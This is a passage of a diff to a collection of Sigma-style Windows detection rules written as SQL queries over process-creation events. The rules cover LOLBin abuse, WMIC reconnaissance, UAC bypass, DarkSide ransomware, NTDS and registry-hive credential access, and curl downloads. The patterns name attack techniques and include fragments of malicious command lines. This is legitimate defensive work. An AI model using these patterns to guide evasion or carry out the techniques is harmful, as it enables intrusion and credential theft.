--processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_lolbin_squirrel.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Suspicious RunAs-Like Flag Combination", - "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", + "title": "Computer System Reconnaissance Via Wmic.EXE", + "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "status": "experimental", - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.discovery", + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" + "filename": "proc_creation_win_wmic_recon_computersystem.yml" }, { - "title": "Potential Product Class Reconnaissance Via Wmic.EXE", - "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "status": "test", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_product_class.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Password Protected Compressed File Extraction Via 7Zip", - "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", + "title": "Service StartupType Change Via PowerShell Set-Service", + "id": "62b20d44-1546-4e61-afce-8e175eb9473c", "status": "experimental", - "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", + "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate activity is expected since extracting files with a password can be common in some environement." + "False positives may occur with troubleshooting scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_7zip_password_extraction.yml" + "filename": "proc_creation_win_powershell_set_service_disabled.yml" }, { - "title": "Monitoring Winget For LOLbin Execution", - "id": "313d6012-51a0-4d93-8dfc-de8553239e25", - "status": "experimental", - "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them without touching disk. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", - "author": "Sreeman, Florian Roth (Nextron Systems), Frack113", + "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "blueteamer8699", "tags": [ - "attack.defense_evasion", + "attack.discovery", "attack.execution", - "attack.t1059" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND CommandLine LIKE '%install%' ESCAPE '\\' AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_execution_via_winget.yml" + "filename": "proc_creation_win_lolbin_gather_network_info.yml" }, { - "title": "Enumeration for Credentials in Registry", - "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "status": "test", - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + }, + { + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "status": "test", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ "Unknown" ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + }, + { + "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "status": "test", + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "author": "Thomas Patzke", + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "falsepositives": [ + "NTDS maintenance" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" + "filename": "proc_creation_win_ntdsutil_usage.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", - "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "status": "test", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Pubprn.vbs Proxy Execution", - "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", - "status": "experimental", - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", - "author": "frack113", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1204" + ], + "falsepositives": [ + "Unknown", + "UAC bypass method used by other malware" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_darkside_ransomware.yml" + }, + { + "title": "Abusing Print Executable", + "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "status": "test", + "description": "Attackers can use print.exe for remote file copy", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pubprn.yml" + "filename": "proc_creation_win_print_remote_file_copy.yml" }, { - "title": "Add New Windows Capability - ProcCreation", - "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", + "title": "Python Inline Command Execution", + "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Python libraries that use a flag starting with \"-c\". Filter according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'python.exe' OR (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_add_windows_capability.yml" + "filename": "proc_creation_win_python_inline_command_execution.yml" }, { - "title": "Stop Windows Service Via Sc.EXE", - "id": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\') AND NOT ((CommandLine IN ('sc stop KSCWebConsoleMessageQueue', 'sc stop LGHUBUpdaterService') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_stop_service.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", + "status": "experimental", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "title": "Rundll32 With Suspicious Parent Process", + "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", + "author": "CD_ROM_", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_rundll32_parent_explorer.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "cve.2022.29072" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN 